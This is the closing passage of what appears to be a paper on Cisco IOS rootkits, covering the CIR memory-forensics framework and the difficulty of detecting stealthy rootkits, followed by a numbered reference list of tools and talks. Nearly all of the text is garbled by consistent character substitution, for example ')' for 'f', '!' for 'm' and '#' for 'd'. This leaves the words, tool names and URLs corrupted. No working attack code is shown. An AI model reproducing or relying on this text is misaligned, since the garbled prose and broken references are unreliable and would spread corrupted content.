)orensics12B3* The C+R analysis )ra!e%ork ai!s at i#enti)ying co!pro!ise# routers" e'ploitation atte!pts an# back#oors ,, as %ell as process an# !e!ory ano!alies* The )ra!e%ork inspects a snapshot o) the lie +OS !e!ory 6core #u!p or X4P #ebug connection7 an# reconstructs the central #ata structures" proi#ing an abstraction layer )or in,#epth analysis !o#ules an# reporting* +t's i!portant to !ake a special !ention o) C+R because it's the O8&_ serious 6an# possible7 %ay to per)or! )orensics on a Cisco #eice an# it still !ight be co!plicate# i) the rootkit controls the core,#u!p generation routines* +n that case" the C+R alternatie !etho#s like X4P #ebug connection shoul# be use#* (nless eery syste! a#!inistrator plans on using a#ance# )orensics !etho#s on eery #eice on their net%orks like the one 6an# only7 !entione# be)ore" they shoul# take serious security !easures an# try to keep the #eices up#ate# to !ini!ize risks* Een this %ork !ay not be enough to #etect an a#ance# rootkit alrea#y #eploye# in the syste!" #epen#ing on the stealth leel o) the rootkit ,, so" e'ternal !etho#s o) #eice co!pro!ise #etection shoul# be conceie# because relaying in a possible in)ecte# i!age is as ba# as running antiirus in a co!puter alrea#y in)ecte#" an# relaying in an OS that is alrea#y co!pro!ise#* Page 36 of 37 "eferences 123 - )ree 0ython interpreter )or $in#o%s calle# -ctie0ython can be obtaine# at? http?II%%%*actiestate*co!I0ro#uctsIactiepythonI)eatures*ple' 123 0ython )or beginners http?II%iki*python*orgI!oinIPeginnersXui#e 1>3 +4- 0ro #isasse!bler an# #ebugger http?II%%%*he',rays*co!Ii#aproI 1B3 +4-0ython is a plug,in )or +4- 0ro to allo% python scripts to be e'ecute# in the conte't o) +4- an# to access all o) its )unctions* +t can be #o%nloa#e# )ro! http?II#,#o!e*netIi#apython 1O3 'The E&/ irus %riting <O$TO' http?II%%%*linu'security*co!IresourceH)ilesI#ocu!entationIirus, %riting,<O$TOIHht!lIin#e'*ht!l 1E3 4aniel <o#son presentation at R(9CO8 200B http?II%%%*ru'con*org*auI)ilesI200BI22,#anielHho#son*ppt 1Q3 4o%nloa# XCC 6X8( Co!piler Collection7 at http?IIgcc*gnu*orgI 183 XCC cross co!piler in)o at? http?IIen*%ikipe#ia*orgI%ikiICrossHco!piler 1D3 0yEl) is a si!ple library )or easy E&/ )ile !anipulation* Re)er to Core Security Technologies' site )or ne%s about it* 1203 X8( Pinutils can be obtaine# at ? http?II%%%*gnu*orgIso)t%areIbinutilsIbinutils*ht!l 1223 +n)or!ation about the tool calle# ob=#u!p inclu#e# in binutils can be obtaine# at http?IIen*%ikipe#ia*orgI%ikiIOb=#u!p 1223 X4P is The X8( 4ebugger 0ro=ect an# in)or!ation about it can be obtaine# )ro! http?IIsource%are*orgIg#bI 12>3 C+R 6Cisco +n)or!ation Retrieal7 http?IIcir*recurity,labs*co!I 12B3 '4eelop!ents in +OS /orensics' http://www.recurity- la!.co"/co#te#t/pu/$ecurity%a!&'e(elop"e#t!&i#&)*+&,ore#!ic!.p-f Page 37 of 37